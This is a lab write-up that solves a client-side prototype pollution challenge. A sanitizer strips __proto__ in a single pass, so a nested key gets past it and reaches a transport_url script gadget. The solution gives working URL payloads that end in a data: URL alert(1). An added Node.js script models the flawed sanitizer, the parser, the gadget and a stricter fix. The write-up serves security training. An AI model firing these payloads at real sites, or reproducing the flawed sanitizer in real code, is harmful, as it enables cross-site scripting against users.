29.3 Lab: Client-side prototype pollution via flawed sanitization


Karthikeyan Nagaraj
2 min read · Jun 13, 2024

Description

This lab is vulnerable to DOM XSS via client-side prototype pollution. Although the developers have implemented measures to prevent prototype pollution, these can be easily bypassed.

To solve the lab:

  1. Find a source that you can use to add arbitrary properties to the global Object.prototype.
  2. Identify a gadget property that allows you to execute arbitrary JavaScript.
  3. Combine these to call alert().

Solution

  1. Using the prototype pollution source (the query string, which the page parses into an object), try injecting an arbitrary transport_url property. The sanitizer strips the string __proto__ from each key, but only in a single pass, so a key that still reads __proto__ after one removal slips through:
    /?__pro__proto__to__[transport_url]=foo
  2. In the browser DevTools panel, go to the Elements tab and study the HTML content of the page. Observe that a <script> element has been rendered on the page with its src attribute set to foo, confirming that transport_url is being read from Object.prototype.
  3. Modify the payload in the URL to inject an XSS proof-of-concept. For example, you can use a data: URL, which the injected <script> will load as long as the page's Content Security Policy does not forbid it:
    /?__pro__proto__to__[transport_url]=data:,alert(1);
  4. Observe that alert(1) is called and the lab is solved.
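The following Node.js script is an added example, not the lab's own source or the author's code. It models the pattern the steps above exploit: a key sanitizer that strips dangerous tokens in one pass, a deparam-style query parser that assigns through nested property names, and a gadget that reads config.transport_url. The names sanitizeKeyFlawed, sanitizeKeyStrict, deparam, gadgetScriptSrc and runScenario, the token list, and the constructed config object are all assumptions for illustration; the real lab code may differ in detail. A stricter sanitizer that rejects keys instead of rewriting them is shown beside the flawed one.

```javascript
// Added example (not the lab's own source): a minimal model of the flawed
// sanitization this write-up bypasses. The names sanitizeKeyFlawed,
// sanitizeKeyStrict, deparam, gadgetScriptSrc and runScenario are assumptions.

// Flawed sanitizer: strips each dangerous token in a single, non-recursive pass.
// Removing "__proto__" from "__pro__proto__to__" leaves "__proto__" behind.
function sanitizeKeyFlawed(key) {
  const bad = ['constructor', '__proto__', 'prototype'];
  for (const token of bad) key = key.split(token).join('');
  return key;
}

// Hardened sanitizer: reject the key outright instead of rewriting it, so no
// amount of nesting can reassemble a dangerous token after the check.
function sanitizeKeyStrict(key) {
  const bad = ['constructor', '__proto__', 'prototype'];
  for (const token of bad) {
    if (key.includes(token)) throw new Error(`rejected key: ${key}`);
  }
  return key;
}

// Minimal jQuery-deparam-style parser: "a[b][c]=v" becomes {a:{b:{c:"v"}}}.
// Every key segment passes through `sanitize`. Because segments are used as
// plain property names, a surviving "__proto__" segment walks onto
// Object.prototype and the final assignment pollutes it.
function deparam(query, sanitize) {
  const result = {};
  for (const pair of query.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const [rawKey, rawValue = ''] = pair.split('=');
    const value = decodeURIComponent(rawValue);
    const segments = decodeURIComponent(rawKey)
      .replace(/\]/g, '')
      .split('[')
      .map(sanitize);
    let cursor = result;
    for (let i = 0; i < segments.length - 1; i++) {
      const seg = segments[i];
      if (typeof cursor[seg] !== 'object' || cursor[seg] === null) cursor[seg] = {};
      cursor = cursor[seg];
    }
    cursor[segments[segments.length - 1]] = value;
  }
  return result;
}

// Gadget: the sink pattern the lab describes. The app reads config.transport_url
// and, if it is truthy, uses it as a <script src>. `config` has no own
// transport_url, so the lookup falls through the prototype chain.
function gadgetScriptSrc(config) {
  const transportUrl = config.transport_url;
  return transportUrl ? String(transportUrl) : null;
}

// Run one query through the parser and the gadget; report whether
// Object.prototype was polluted and what src the gadget would emit.
// Object.prototype is restored afterwards so runs do not contaminate each other.
function runScenario(query, sanitize) {
  delete Object.prototype.transport_url;
  let error = null;
  try {
    deparam(query, sanitize);
  } catch (e) {
    error = e.message;
  }
  const config = { params: 'search' }; // constructed app config, no transport_url
  const src = gadgetScriptSrc(config);
  const polluted = Object.prototype.hasOwnProperty.call(Object.prototype, 'transport_url');
  delete Object.prototype.transport_url;
  return { polluted, src, error };
}

// Stand-alone demonstration of the three cases.
console.log('naive __proto__ vs flawed filter:',
  runScenario('?__proto__[transport_url]=foo', sanitizeKeyFlawed));
console.log('nested bypass vs flawed filter:',
  runScenario('?__pro__proto__to__[transport_url]=data:,alert(1);', sanitizeKeyFlawed));
console.log('nested bypass vs strict filter:',
  runScenario('?__pro__proto__to__[transport_url]=data:,alert(1);', sanitizeKeyStrict));
```

Run it with `node`. The first case shows that a plain __proto__ key is neutralised by the flawed filter, the second shows the nested key surviving one stripping pass and landing transport_url on Object.prototype, and the third shows that rejecting the key instead of rewriting it closes the bypass. The same idea generalises to any single-pass blocklist sanitizer: whatever it removes can be reassembled by splicing the token inside itself.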

